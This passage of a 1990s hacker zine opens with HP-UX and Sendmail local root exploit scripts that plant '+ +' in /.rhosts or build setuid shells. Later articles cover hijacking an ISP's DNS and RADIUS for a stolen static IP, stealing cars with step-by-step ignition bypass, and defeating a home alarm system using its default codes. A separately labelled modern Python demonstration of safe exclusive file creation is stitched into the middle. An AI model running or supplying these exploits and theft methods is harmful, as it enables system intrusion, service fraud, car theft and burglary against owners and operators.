echo '+ +' > /.rhosts
if [ -f /tmp/rhosts-save ]
then
cat /tmp/rhosts-save >> /.rhosts
rm /tmp/rhosts-save
fi
#rm ~/glance.err # This goes away? Why does this go away?
chmod 666 /.rhosts
chown root /.rhosts
remsh localhost -l root /bin/ksh -i
+++++
HPUX - remotewatch checkcore - more HPUX root fun
:
#!/bin/ksh
# SOD (as of 06/11/96)
# same sorta bug, different file.
if [ ! -x /usr/remwatch/bin/fmon/checkcore ]
then
echo This is an exploit for the checkcore utility internal to
echo HP\'s Remote Watch series of programs.
echo The checkcore utility doesn\'t appear to be on your system.
echo Moo
exit
fi
PGM=$*
if [ -z "${PGM}" ]
then
PROGGIE=`basename $0`
echo "${PROGGIE}: I will run a shell for you"
PGM="/bin/ksh -i"
fi
TTY=`tty`
echo '#!/bin/ksh' > /tmp/find
echo "${PGM} >> ${TTY} 2>&1" >> /tmp/find
chmod 777 /tmp/find
PATH=/tmp:$PATH
export PATH
/usr/remwatch/bin/fmon/checkcore > /dev/null 2>&1
rm /tmp/find
+++++
HPUX - remotewatch /tmp problem - yes, another root bug for hockey pucks
:
#!/usr/bin/perl
# displays a problem with RemoteWatch use of /tmp to store filestuffs
# SOD - June 96
use Socket;
use FileHandle;
$SIG{'INT'} = 'dokill';
sub dokill { kill 9,$child if $child; }
STDOUT->autoflush();
sub h2cs {
local($stuff)=@_;
local($rv);
while($stuff !~ /^$/) {
$bob=$stuff;
$bob =~ s/^(..).*$/$1/;
$stuff =~ s/^..//;
$rv.=chr(oct("0x${bob}"));
}
return $rv;
}
if (-f "/.rhosts") {
print "/.rhosts exists! Cannot spooge...\n";
print "(but I can be used to make ANY root owned world writable file...)\n";
exit;
}
print "This program will attempt to put + + into /.rhosts\n";
system("rm -rf /tmp/iconTmpUpdate");
chop($host=`hostname`);
mkdir("/tmp/iconTmpUpdate",0777);
mkdir("/tmp/iconTmpUpdate/$host",0777);
chmod(0777,"/tmp/iconTmpUpdate","/tmp/iconTmpUpdate/$host");
symlink("/.rhosts","/tmp/iconTmpUpdate/$host/done")||die "$!: cannot symlink";
$port=5556;
shift(@ARGV);
($name, $aliases, $proto) = getprotobyname('tcp');
($name, $aliases, $type, $len, $thataddr) = gethostbyname($host);
$that=pack('S n a4 x8', AF_INET, $port, $thataddr);
socket(S,PF_INET,SOCK_STREAM,$proto)|| die "socket: $!";
connect(S,$that) || die "connect: $!";
S->autoflush();
# 20 20 31 7a gives back a 0x6f(111) -- meaning WHAT exactly?
#print S h2cs("2020317a");
# 20 20 31 5a gives back 0 0 5 0xa(10) -- gah?
print S h2cs("202031");
print S chr(117);
print "Please wait";
while($c=getc(S)) {
print ".";
}
close(S);
$n=0;
while($n++<6) {
print "\nOK...";
last if (-f "/.rhosts");
sleep 1;
}
print "\n";
open(R,">>/.rhosts");
print R "+ +\n";
close(R);
print "Testing out your root shell...\n";
system("remsh $host -l root sh -i");
exit;
STDOUT->autoflush();
if ($child = fork) {
while (<>) { print S; }
sleep 3;
do dokill();
} else {
while (<S>) { print; }
}
close(S);
exit;
+++++
HPUX - ppl log problem - can it be? yes.. another problem with hpux. someone
should fire the hpux development team.
:
#!/bin/ksh
# need update for 10.X
# 10.X =/var/ppl/log
VER=`uname -r | cut -f2 -d.`
if [ "${VER}" = "10" ]
then
LOG=/var/ppl/log
else
LOG=/usr/spool/ppl/log
fi
mv $LOG $LOG.old
ln -s /.rhosts $LOG
ppl -o '\
+ +
'
rm $LOG
mv $LOG.old $LOG
+++++
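The HPUX swinstall, ppl, glance, iconTmpUpdate and ppl log listings above all rest on one defect: a privileged program writes to a predictable path the attacker can pre-seed with a symlink, so the write lands in /.rhosts. The added example below (not from the article or from HP-UX; the scratch directory and file names are constructed) reproduces that in a throw-away directory and shows the exclusive-create open that refuses the planted link.

```python
"""Why O_CREAT|O_EXCL (plus O_NOFOLLOW) defeats the symlink-in-/tmp trick.

Added example, not from the TFC article or from any HP-UX tool.  The
swinstall, ppl, glance, iconTmpUpdate and ppl-log exploits above all
share one defect: a privileged program opens a file at a predictable,
attacker-writable path (a PID-derived /tmp name, a core file, a log) and
follows a symlink planted there.  This script plants such a link in a
scratch directory, shows the naive open() following it, and shows the
exclusive open refusing.
"""
import errno
import os
import tempfile


def naive_write(path, data):
    """The vulnerable pattern: open for writing and follow whatever is there.

    open(..., "w") is O_WRONLY|O_CREAT|O_TRUNC with no O_EXCL, so a symlink
    at `path` silently redirects the write to its target.
    """
    with open(path, "w") as fh:
        fh.write(data)


def exclusive_create(path, data, mode=0o600):
    """Create `path` only if that name is not already taken in any form.

    O_CREAT|O_EXCL fails with EEXIST when the name exists, and POSIX requires
    that a symlink count as existing regardless of where it points.  O_NOFOLLOW
    is added where the platform has it as a second line of defence (ELOOP).
    Returns True if the file was created, False if the name was occupied.
    """
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    try:
        fd = os.open(path, flags, mode)
    except OSError as exc:
        if exc.errno in (errno.EEXIST, errno.ELOOP):
            return False
        raise
    with os.fdopen(fd, "w") as fh:
        fh.write(data)
    return True


def read_file(path):
    with open(path) as fh:
        return fh.read()


def demonstrate():
    """Plant a link and try both opens through it.

    Returns (victim contents after the naive write, victim contents after the
    exclusive attempt, whether the exclusive create reported success).  The
    scratch directory stands in for /tmp, `rhosts` for /.rhosts, and the
    predictable name mimics the PID-derived one the swinstall script guesses.
    """
    with tempfile.TemporaryDirectory() as scratch:
        victim = os.path.join(scratch, "rhosts")
        open(victim, "w").close()                 # exists and is empty
        planted = os.path.join(scratch, "AAAa00042")
        os.symlink(victim, planted)               # the pre-seeded link

        naive_write(planted, "+ +\n")             # follows the link
        after_naive = read_file(victim)

        open(victim, "w").close()                 # reset for the second run
        created = exclusive_create(planted, "+ +\n")
        after_exclusive = read_file(victim)
    return after_naive, after_exclusive, created


if __name__ == "__main__":
    naive, exclusive, ok = demonstrate()
    print("naive open wrote through the link:", repr(naive))
    print("exclusive open created file:", ok, "victim now:", repr(exclusive))
```

The same flags are what a privileged program must use for any file under a directory others can write to; a fixed name with O_EXCL still loses to a pre-planted file, which is why a fresh random name (mkstemp) is the usual companion to the exclusive open.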
Sendmail (8.8.2) - smtpd bug - creates root suid shell in /tmp
:
#!/bin/sh
echo 'main() '>>foo.c
echo '{ '>>foo.c
echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>foo.c
echo '} '>>foo.c
#
#
echo 'main() '>>smtpd.c
echo '{ '>>smtpd.c
echo ' setuid(0); setgid(0); '>>smtpd.c
echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c
echo '} '>>smtpd.c
#
#
cc -o foo foo.c;cc -o /tmp/smtpd smtpd.c
./foo
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
rm foo.c foo smtpd.c /tmp/smtpd
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Time for a Change presents
Portmaster outdials and static IP's
by
Rush 2
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
It was discussed a while back how to set up a portmaster to be an outdial..
i've been playing around with them a lot lately and reading up on them and
have a few things i would like to discuss regarding them..
first, to set up an outdial on a portmaster, you need a couple of short steps.
you need to..
set (portnumber) twoway /dev/network network twoway
set (portnumber) service_device telnet (telnet port number)
from the manual:
in "twoway" mode, the port operates in User Login mode if carrier is detected
on pin 8 of the RS-232 connector (DCD). otherwise, it can be accessed as a
host device on the computer.
the host device is the name of a pseudo tty device in the /dev directory.
/dev/ttyp0-/dev/ttypf
/dev/ttyq0-/dev/ttyqf
/dev/ttyr0-/dev/ttyrf
/dev/network may be used for specifying the port as a device when a physical
port is not required or if one is not available.
you could even set it for dial out instead of twoway if you want the port to
only be used as a dialout.. that is, of course, something that you would
only want to do if you were setting something like this up on your *own* pm's
as it would be more easily detected than setting it twoway.
there are a number of weird things i've come across reading the portmaster
manuals and see the potential for a lot of really keen things. for example,
the option of "dialback" (as set up within radius) calls the user back after
logging in.. this presents the potential for more secure connections or (a
more realistic view) allow isp's and end users to circumvent the per minute
charges on isdn lines..
it would be set up with..
User-Service-Type = Dialback-User,
Dialback-No = "18005551212"
oh well.. my 2 cents on portmasters.. let me know if there are any questions or
things you need to know about them and I'll do my best to shed some light (or
create some confusion).
you can attach to a port when you're inside the pm administrative tool. but
this is done if you have access to the port master. we are talking about
actually allowing you to connect from an arbitrary location without giving out
access to the portmaster. but yeah, attach just throws you into a terminal
mode.
proper format is
attach <portno>
as you have stated above.
you will actually get RING's, etc on that port when you do this.. and pick up
and throw whatever bogus information you want. pretty nifty to fuck with
people dialing in.
----------------------
Static IP'S Through A livingston Portmaster Anyone?
ok, first off get root on their nameserver
look at the file /etc/named.boot there should be a line in there like
primary c.b.a.in-addr.arpa db.a.b.c
or something like that. where a.b.c.d is your address you are assigned
the 'db.a.b.c' could be anything, that's the data file for the reverse
dns tables.
somewhere else in the file /etc/named.boot should be a line like:
directory /foo/bar
this is the directory in which the data file 'db.a.b.c' is in.
so:
cd /foo/bar
vi db.a.b.c
this file will have a bunch of shit in it, SOA's, NS's and a whole lot of PTR
records. (if you really want to know more, get the o'reilly book)
there are two things you need to add, somewhere in the middle of the file,
add a line:
d IN PTR myhost.domain.name.
where 'd' is the host portion of your a.b.c.d ip address, and myhost.domain.name.
is your domain name. DONT FORGET THE TRAILING DOT.
the next thing you need to change is the serial #.
the first line of the file is either:
@ IN SOA nameserver.isp.com. postmaster.isp.com. (
(bunch of numbers)
or
c.b.a.in-addr.arpa. IN SOA nameserver.isp.com. postmaster.isp.com. (
(bunch of numbers)
the first number in a list of (i think) 5 numbers is the serial number
you have to increment it - some sites just start at '1' and go up,
while others use like 96081001 (year,month,day,revision) - if you
don't change it your changes won't propagate
ps: the SOA line has after the SOA the name of the machine that originated
the data (nameserver.isp.com.) and the email of the person responsible
for the data with the '@' turned into a '.' - note the trailing dots.
once you've changed that, you need to change the primary dns data.
check /etc/named.boot for a line like:
primary isp.com db.isp.com
where isp.com is the domain of the isp, and db.isp.com is the name of the data
file.. so:
cd /foo/bar
vi db.isp.com
you will want to increment the serial # again, and then add in the forward
dns for your hostname.. in the middle of the file add at least :
myhost IN A a.b.c.d
there's other stuff you can add, like HINFO, MX and other stuff... but
just look at other stuff in there and add something similar.. note
there is no '.' after myhost, the domain name this file is a data file
for is implied after myhost (myhost.isp.com) if there is no dot..
this is why the dots are important in the reverse DNS or you end up
with reverse resolution like myhost.isp.com.c.b.a.in-addr.arpa which
I'm sure you've seen.. anyway, once you made the changes and
incremented the necessary serial numbers, you need to restart the nameserver..
you do this by sending it a SIGHUP...
ps -aux | grep name
(oops, ps -ef - fucking i hate sysv) - look for 'named' or 'in.named'
kill -HUP <pid>
wait about 5-10 seconds for the nameserver to finish thinking.. then
do:
nslookup
# make sure the default server is localhost or nameserver.isp.com
ls -d c.b.a.in-addr.arpa # prints the whole reverse domain
# or, this may work if you've compiled nslookup with the option
set q=ptr
a.b.c.d
# also check the forward dns
set q=a
myhost.isp.com
# make sure they resolve.. note also you can do:
ls -d isp.com
# and look for your hostname in the dump
^D
#to exit
note you can also use:
# host a.b.c.d
and
# host myhost.isp.com
but you have to install the tools stuff from the bind distribution,
but most people are too dumb to do that..
if they run radiusd (which i am sure they do), modify the /etc/raddb/users
file. you will need to add an entry such as:
Pusername Password = "password" # or password = "UNIX"
User-Service-Type = Framed-User,
Framed-Protocol = PPP,
Framed-Address = your.static.ip,
Framed-Netmask = 255.255.255.225,
Framed-Routing = "x.x.x.x x.x.x.x†1",
Framed-MTU = 1500,
Framed-Compression = Van-Jacobsen-TCP-IP
if your account doesn't have a static ip, the Framed-Routing is set to
None, and your Framed-Address is 255.255.255.254.
depending on what radiusd you're running, you'll either have an entry in the
radius file, or it will be taken care of by the DEFAULT entry which is just
DEFAULT Password = "UNIX"
User-Service-Type = Login-User,
Login-Service = Portmaster,
Login-Host = x.x.x.x
we're probably the only isp in the world that still keeps some of our passwords
in clear text in the users file. someone correct me if i am wrong on anything
above.
assuming they use radiusd, put something like this in the users file
USER Password = "UNIX",
User-Service-Type = Framed-User,
Framed-Protocol = PPP,
Framed-Address = a.b.c.d,
Framed-Netmask = 255.255.255.0,
Framed-Routing = None,
Framed-Compression = Van-Jacobsen-TCP-IP,
Framed-MTU = 1500
of course, this will prob be detected really really really quickly, maybe
trojupgrading the radius daemon would be a better idea.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Time For a Change
presents
Wisdom From the Repo Man
(How to steal cars)
by
Caliban
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
INTRODUCTION
------------
Stealing cars is what I used to do for a living, yes it was legal. This
article is basically a how to on the subject. I want it to be understood
that I do not intentionally give out this info to make car thieves out of
every reader, but what you do with this information is your prerogative.
Several times, the knowledge I obtained in this line of work came in quite
handy. Example: locking my keys in my truck or having no keys at all.
Here are the basic fundamentals of getting into and successfully driving a
vehicle without keys or consent.
PLANNING
--------
First, you must locate a vehicle. This is not as easy as it sounds.
Brightly lit areas where people are known to have guns is not necessarily a
good start. In choosing a car, one must consider the following:
1. Is the car in a position to be driven out quickly? Do I have an easy
escape if something should go wrong?
2. Is the car ignition and locking system known to me?
3. If #2, do I have the proper tools?
4. Is there any way for the owner to see me clearly or get a shot off
with nothing between us?
Some repo pros probably have other top priorities, but these worked well
for me.
With Step 1 you should make sure you have several escapes with the car and
without. DON'T RISK IT! There are thousands more cars that are probably
easier. You just have to look.
Step 2 is tricky. There are as many different lock and ignitions as there are
years and models. The most common are steel rods in the doors that go directly
to the lock. Most ignitions can be popped out easily with some common tools.
This brings us to Step 3: Tools. Don't be intimidated by the fancy gadgets
on TV. I started with a coat hanger and a couple of screwdrivers and had
very few problems. Don't worry we'll get into all of that in just a minute.
Step 4 is pretty self-explanatory. Try to keep something between you and the
house or building if possible.
Clothing:
Let's say you need to get into a car. First wear dark clothing but try not
to look too suspicious. Don't be an idiot either and wear the Nikes with
the lights that flash with every step. Ok, now you have the clothing.
Tools:
If slim-jims and slide hammers are not available to you, relax. A coat
hanger (thick metal of course), a short and average sized phillips head
screwdriver and 2 flatheads, one short and one standard. A small prybar or
large flathead, electrical tape, and a pair of channel lock pliers should
do it. A punch is also helpful. Be sure to bring black electrical tape as
well.
Now you have the clothes with which you can move unseen and the tools to
remove the target. You will need a motive and destination. That part is
up to you.
It should be noted that some cars are easier than others. All Toyota cars
and trucks up to 1990 are very easy, most all of the lock systems are the
same or similar. Fords.. Well, Fords are pretty easy if you want one of those.
Stay away from newer cars if possible. I know they are cool, fast, and
command a high price from your chop shop buddies, but save those until you
are more experienced. They take more time, have alarms, and engine kill
systems if the proper magnetic or infrared signature is not given with the
key. There are ways around these too, but that is another article altogether.
Here comes the good part, I told you I wouldn't let you down!
LIBERATION
----------
Approach the car with your coat hanger fully extended with a hook on one
end. Make sure to check the obvious, the moron could've left it open. Also
check for lowered windows and partially shut doors. No use in doing more
work than you have to, right? If these opportunities do not present
themselves, slim-jimming the door or breaking the window are your two options. I
recommend the coat hanger/slim-jim myself. Who wants to make all that noise
and sit in broken glass anyway?
When slim-jim'ing the door, stick the hooked end of the coat hanger between
the window and the weather strip. Lower it down about a foot or so. What you
are looking for is the steel rod that when lifted will unlock the door. This
will take some time if you are not familiar with the configuration. This
brings up another point. Practice on your car or your friends' cars.
You can also go to an auto parts store and look up by the type of car you
want in a Chilton's or Haynes manual, and there are usually pretty good
diagrams of the ignition and door locks. if you're lucky they will have a
copy machine, and then you have your very own repo manual for that car.
Once you are inside the car, getting to the ignition can be done one of two
ways:
1. The kind and delicate approach.
Unscrew the steering column cover. Use a punch to pop the upper
ignition (the part the key goes in).
2. The Dash Bash
Get out your pry bar or big screwdriver boys!
(this is a fast speedy approach if time is critical and steering
column aesthetics are not)
Either approach will lead you to the next step;
Separating the upper ignition from the lower ignition.
A pair of channel lock pliers can be used to grasp the upper ignition and
the tip of your coat hanger can be inserted into the locking pin directly
facing you. You have to push the pin in, and then twist and pull with the
channel locks. (This works on most ignition systems). The next step is to
pull the lower ignition, this is easy, simply pull down. Sometimes there
will be a phillips screw securing the lower ignition to the steering column.
I should probably tell you what a lower ignition looks like:
Usually they are white, and they have many, many wires soldered to them.
After pulling the lower ignition, remove the connecting spindle. This will
be a metal rod that connects the upper ignition to the lower. Take the
channel lock pliers, and look underneath the column into the lower ignition
socket. You will see a piece of metal protruding from the upper ignition.
There will be a spur perpendicular to the spindle. This is made to snap off,
all you need to do is grab ahold of the spindle with your pliers and give a
good twist. You need to push the spindle up with your finger and remove it
from the upper ignition socket. Then take a flathead screwdriver, place it
in the upper ignition socket and apply upward pressure on the screwdriver.
This will unlock your steering wheel. In order for it to stay unlocked, your
electrical tape now has a use. I usually tape it directly to the steering
column (Make sure it is tight and secure). Take a flathead screwdriver and
look at the lower ignition. This is the actual ignition switch. You will see
a black circle with a hole in it. This is where the connecting spindle
normally fits. Stick your flathead screwdriver in and turn clockwise. VROOM!
Now all you have to worry about are cops, angry gun-toting owners, stupid
drunken friends, and a place to ditch it.
Although many cars are different, this technique should be fairly consistent
with most 1990 and older vehicles. Alarms and other theft deterrents, e.g.
The Club, will be discussed in the next issue. As I mentioned before, be
careful and don't risk it unless absolutely necessary. Spread on what you
have garnered from this article to other would-be needy people. Until next
time.
Caliban
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Time For a Change Presents
Using, Programming and Defeating the WSS5010
by
Orestes
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
"No peace without justice and that's for real."
- KMFDM
0. INTRODUCTION
This article attempts to present an overview of the electronic
security systems currently in use today. While the practical value of the
article is not greater than the abstract, it presents a picture of what is
and is not standard, what can and cannot be done, what the risk can be,
and how the wiring works, among other important things.
The case study is the Westinghouse WSS5010, a run-of-the-mill home
security system with many possible peripherals. It is assumed that the
abstract concepts will come naturally when studying the WSS5010. While
the Westinghouse system presented is much more chez Robert Allen than it
is Main Street's central office or Class of 1917 Hall, the basic ideas are
the same.
This is a large article and the reasons for reading it may not be
apparent at first. I ask for your patience. Upon completion, the reader
will have the expertise of one of Westinghouse's own technicians, and
among other things, will be able to:
o Reprogram a WSS5010 system to any degree
o Disable communication to the central station in any number of
ways
o Access a WSS5010 remotely
o Exit a WSS5010-protected building without a problem
o Spoof alarms with minimal information
There are lots of funny things you can do to the system, too.
In order to understand the text, you may need to consult the
glossary in Appendix A. Please feel free to do so.
1. THE CONTROL PANEL
The WSS5010 control panel is where the action goes on. It
supports thirty-seven access codes, which are subdivided into thirty-two
users, one system master, two masters, and two duresses. The standard
WSS5010 comes with eight zones, but can be expanded to a maximum of
thirty-two. There are twenty-seven out-of-box zone types and seven
customizable templates. The only out-of-box zone is the two-way smoke
alarm system. All system memory is encoded into EEPROMs so the system
will not lose its programming or status upon AC and battery failure.
There are two different types of keypads which are available for
the WSS5010 (see below). All keypads have a four wire (quad) connection
to KEYBUS. A maximum of eight keypads can be attached to the system.
There's also a built-in piezoelectric buzzer.
The system supports event-initiated paging with up to three phone
numbers kept in memory. There is also support for DTMF and pulse dialing,
DPDT line seizure, and LINKS 1000 cellular communication (see below).
The WSS5010 monitors many "trouble" conditions, including the
following:
o AC power failure
o Trouble by zone
o Fire trouble
o Telephone line trouble
o Low battery condition
o Bell output trouble
o Loss of internal clock
o AUX power supply fault
o Tamper by zone
o Failure to communicate
o Module fault (supervisory or tamper)
In addition to these basic features:
o Keypads can activate system alarms
o Keypads can be locked out
o Audio capabilities can be added (see below)
o Modules can be 1000' away by four-wire KEYBUS
o Events can be printed (see below)
o 128-entry-long event buffer (see below, printer)
o The system has upload/download capabilities
The following are the out-of-box materials:
o WSS5010 main control cabinet
o WSS5010 main control circuit board *
o WSS5508 keypad
o one Installation Manual *
o one Programming Worksheet Manual *
o one LED End User Manual
o one hardware pack (misc. electronics)
* I possess these.
2. PERIPHERALS
Up to eight keypads of homogeneous or heterogeneous types can be
attached to the panel.
________________________________
| .----------------------------. |
| | Memory | |
| | 1 2 3 4 5 6 7 8 Bypass | | Figure 2.1
| | Fire | | The WSS5508, eight zone LED keypad
| | Programs | | with function keys
| `----------------------------' |
|----------------o--o--o---------|
| |
| |
|________________________________|
| |
| |
| |
| (W) Westinghouse |
|________________________________|
________________________________
| .----------------------------. |
| | | |
| | Enter code | | Figure 2.2
| | To arm system | | The WSS5500, LCD keypad with
| | | | function keys.
| `----------------------------' |
|----------------o--o--o---------|
| |
| |
|________________________________|
| |
| |
| |
| (W) Westinghouse |
|________________________________|
In addition to the keypads these guys are available:
o WSS5108 Eight Zone Expander module
Increases number of zones on the system. A maximum of
three expanders can be added to a total of thirty-two
system zones.
o WSS5132-900 Wireless Receiver Module (not UL listed)
Connects up to thirty-two spread-spectrum 900 MHz wireless
devices, fully supervised and with standard AA or AAA
batteries.
o WSSPIR Wireless Motion Detector (not UL listed)
Used in conjunction with the WSS5132-900. Needs four AAA
batteries.
o WSS5580 Module (not UL listed)
Turns a touch tone phone into a keypad. Contains a
built-in interface to control up to thirty-two line
carrier type devices for lighting and temperature control.
o WSS5908 Audio Interface Module (not UL listed)
The WSS5908 "incorporates paging, intercom, baby
listen-in, background music and door answer to the WSS5010
control panel. This module also has built-in two-way
voice capability for central station."
o WSS5400 Printer Module (not UL listed)
The WSS5400 is an interface to a serial printer. Events
printed are time/date stamped.
o LINKS 1000 Cellular Communicator (not UL listed)
The LINKS starts making calls even if you snip your lines.
o Cabinets
Main panel: 11.3" x 11.7" x 3"
Power supply output module: 8.4" x 9.25" x 3"
Printer module: 9" x 7" x 2.6"
Zone expander: 6" x 4.8" x 1.5"
Wireless receiver: 6.5" x 5.625" x 1.5"
3. ACCESS CODES
[01] to [32] User codes 1 to 32
[33] Duress code
[34] Duress code
[40] System master code
[41] Master code
[42] Master code
System Master Code:
The system master code can do anything, unless System Master Code
Not Changeable {015 Option 6} has been activated, in which case attempting
to change it will cause a long error beep. It can be reprogrammed through
Installer Programming. The default Master Code is 1234.
Master Codes:
Master codes do not exist by default but serve the same function
as the SM code when programmed.
Duress Codes:
Duress codes do not exist by default but create a silent "Duress"
alarm.
User Codes:
User codes do not exist by default but can arm and disarm the
system.
4. KEYPAD COMMANDS
Arming:
The system cannot be armed unless all protected doors and windows
are secured, movement is not occurring in front of motion detectors, etc.,
a condition indicated by the 'Ready' light. There are two types of
arming: stay arming, which arms the perimeter but allows users to stay
inside, and away arming, which arms both the interior and exterior.
Disarming:
"To disarm the panel enter the premises through the designated
entry/exit door. The keypad will emit a steady beep to warn you that you
must disarm the system. During the last ten seconds of entry delay the
panel will pulse the keypad beeper on and off rapidly to warn the entry
delay is about to expire. Enter a valid access code at the keypad. If an
error is made, press the {#} key and enter the code again. When a correct
code is entered the keypad will turn off the 'Armed' light and stop the
keypad buzzer. If an alarm occurred while the panel was armed the 'Memory'
light and the zones which caused the alarm will be flashing. Press the {#}
key to return the keypad to the Ready state."
{*} Commands:
{*}+{1} Zone Bypass/Reactivate Stay/Away Zones:
This command will bypass individual zones. If Code Required for
Bypass {015 Option 5} is enabled, you will have to have a valid access
code.
To bypass a zone:
1. Enter {*}{1} [access code -- see above]. The keypad will turn
on the zone lights for zones already bypassed.
2. Enter the two-digit zone number to bypass the zone. The keypad
will turn on its light.
3. Press {#}.
To un-bypass a zone:
1. Enter {*}{1} [access code -- see above]. The keypad will turn
on the zone lights for zones already bypassed.
2. Enter the two-digit zone number to un-bypass the zone. The keypad
will turn off its light.
3. Press {#}.
When the system is disarmed, all manually bypassed zones will be
un-bypassed.
{*}+{2} Trouble Display:
To view trouble conditions, press {*}{2}. The keypad will flash
the 'Trouble' light and light zones where trouble conditions are present.
During a trouble condition, keypads can be shut up by pressing any key on
any keypad. See Appendix B for trouble codes.
{*}+{3} Alarm Memory:
The 'Memory' light will be on if any alarm has occurred lately
(twenty-four hours). To view alarm memory, press {*}{3}. The keypad will
flash the 'Memory' light and zone lights will light up.
{*}+{4} Door Chime On/Off:
"If enabled the keypad will beep five times rapidly when a zone is
tripped and restored. The panel will only do this for zones with the Door
Chime attribute enabled and if the door chime feature is enabled." To
toggle Door Chime, press {*}{4}. Three beeps means Door Chime is enabled,
and one long beep means disabled.
{*}+{5} Programming Access Codes:
Programming codes:
1. Press {*}{5}{Master Code}. The keypad will flash 'Program' and
turn on the zone light for any code already programmed.
2. Enter the code's two-digit number.
3. Enter a four-digit PIN. The zone light will turn on steady.
4. Continue until all codes are programmed.
5. Press {#}.
Programming attributes:
1. Enter {*}{5}{Master Code}. The keypad will flash 'Program' and
turn on the zone light for any code already programmed.
2. Press {9} to enter attribute mode. The keypad will turn on the
'Ready' light and turn off the armed light.
3. Enter the code's two-digit number. Zone lights {1} to {4}
will be on or off:
Zone Light 1 - ON - User code enabled
Zone Light 2 - ON - (reserved for future use)
Zone Light 3 - ON - enable manual bypass
4. Enter {1} to {3} to toggle the lights.
5. Continue with steps 2 and 3 until all code attributes are
programmed. Then press {#}.
{*}+{6} User Functions:
To program user functions:
1. Press {*}{6}{Master Code}. The keypad will flash 'Program.'
2. Press {1} to {5} for item to be programmed:
{1} - Time and Date - Enter military format, HH MM and MM
DD YY.
{2} - (reserved for future use)
{3} - (reserved for future use)
{4} - System Test - sounds alarms, lights up keypad, tests
batteries.
{5} - Enable DLS (downloading) - panel listens to incoming
phone calls for six hours.
{6} - (reserved for future use)
{7} - (reserved for future use)
Additional features are available with the WSS5500 LCD keypad by
using the arrow keys in the {*}{6} menu. These are:
View Event Buffer
Brightness Control
Contrast Control
Keypad Buzzer Control (different *types* of sounds)
{*}+{7} Utility Output Functions
{*}{7}{1}{Access Code} - "Door Strike" - Activate all PGM outputs
for five seconds.
{*}{7}{2} - Smoke Detector Reset
{*}+{8} Installer Programming
(see below on Installer Programming)
{*}+{9} Arming Without Entry Delay
{*}{9}{Access Code} - Arms without entry delay.
{*}+{0} Quick Exit
Quick Exit gives you two minutes to leave. Activating any
'Delay'-type zone more than once, i.e. opening and shutting a door twice,
will start entry delay. It's not clear in either the Programming
Worksheets or the Installation manual how Quick Exit Enable {015 Option 3}
defaults.
5. INSTALLER PROGRAMMING
Installer programming allows the owner to modify the various
properties of his system when he adds new modules and makes other changes.
This section covers the elementals, and PROGRAM DESCRIPTIONS explores the
various possible changes. Installer programming is pretty complicated.
The default installer code is {5010}, which is "LOLO" on a b1ffed
DTMF keypad, which is the name of GITM's cat which gives such good head.
Just goes to show you that you can't tell a ho by her cover.
To enter installer programming on an LED keypad, press
{*}{8}{Installer Code}. The 'Program' and 'Armed' lights will turn on.
'Armed' indicates it is waiting for you to type in the three-digit section
you want to access. Punch that in now. 'Armed' will turn off and 'Ready'
will turn on.
LCD keypads are much nicer. Enter {*}{8}{Installer Code}. The
keypad will say, "Enter Section---", and that's what you need to do. By
the way, the Installer Code section is {006}. Damn you double-o six!
You can press {3} to exit a section even if you haven't entered
information for all of the boxes. This makes it convenient. Also, if you
need to enter HEX, as can be necessary, press {*} and the hex code, where
1=A, 2=B, 3=C, 4=D, 5=E, and 6=F. This is similar to ALPHALOCK on TI
graphing calculators; if you need to enter decimals afterwards you must
hit {*} again. To make this a little easier to understand:
C1 = {*} {3} {*} {1}
To toggle an option, press the number which corresponds to the
option. The panel will use zone lights for the various options, and they
should go on and off when you press them. {#} exits.
To view programming on an LED pad, enter the section number. The
keypad will display information in binary where:
Zone light 1 = 1
Zone light 2 = 2
Zone light 3 = 4
Zone light 4 = 8
Add it up, Cassandra, and then press an emergency key to advance
to the next digit. When you've advanced through all the digits in a
section, 'Ready' will go off and you can enter a new section number.
Elsewise, press {#}.
On an LCD, it's much easier, and the arrow keys are used to
scroll. Consult the entire text and Appendix C for lots of different
section numbers.
6. ZONE DEFINITIONS
All zones have two-digit codes. The properties here can be
thought of like objects in a MOO in their partial object orientation.
[00] Null Zone (unprogrammed)
[01] Delay 1 Zone - If this zone is violated when the panel is
armed, it will provide an entry delay and the keypad
buzzer will sound to alert the user that the system must
be disarmed or an alarm will be generated.
[02] Delay 2 Zone - Similar to Delay 1 but with a different
entry delay. Typically used for a garage door.
[03] Instant Zone - Instant alarm when violated.
[04] Interior Zone - Causes instant alarm unless a delay zone
was violated recently.
[05] Interior Stay/Away Zone - Interior zone not triggered
during 'Stay' mode or during the exit delay of a 'Delay'
zone, or if the panel is armed without entry delay.
[06] Delay Stay/Away Zone - Similar to [05] but always provides
an entry delay. Typically used for motion detectors to
prevent false alarms because it allows the user to turn
off the panel.
[07] Delayed 24 Hour Fire Zone - Gives the user a chance to
disable the incident before the alarm goes off and the
panel communicates with the central station.
[08] Standard 24 Hour Fire Zone - [07] without the delay.
[09] 24 Hour Supervisory Zone (with LINKS) - If this zone is
violated, regardless of system state, the panel will
communicate with the central station and log the zone
fault.
[10] 24 Hour Supervisory Buzzer Zone - If this zone is
violated, regardless of system state, the keypads will
buzz until a valid user code is entered and the panel will
communicate with the central station.
[11] 24 Hour Burglary Zone - If this zone is violated,
regardless of system state, the keypads will alarm and
the panel will communicate with the central station. [12]
to [20] behave in the same manner.
[12] 24 Hour Holdup Zone
[13] 24 Hour Gas Zone
[14] 24 Hour Heat Zone
[15] (unused)
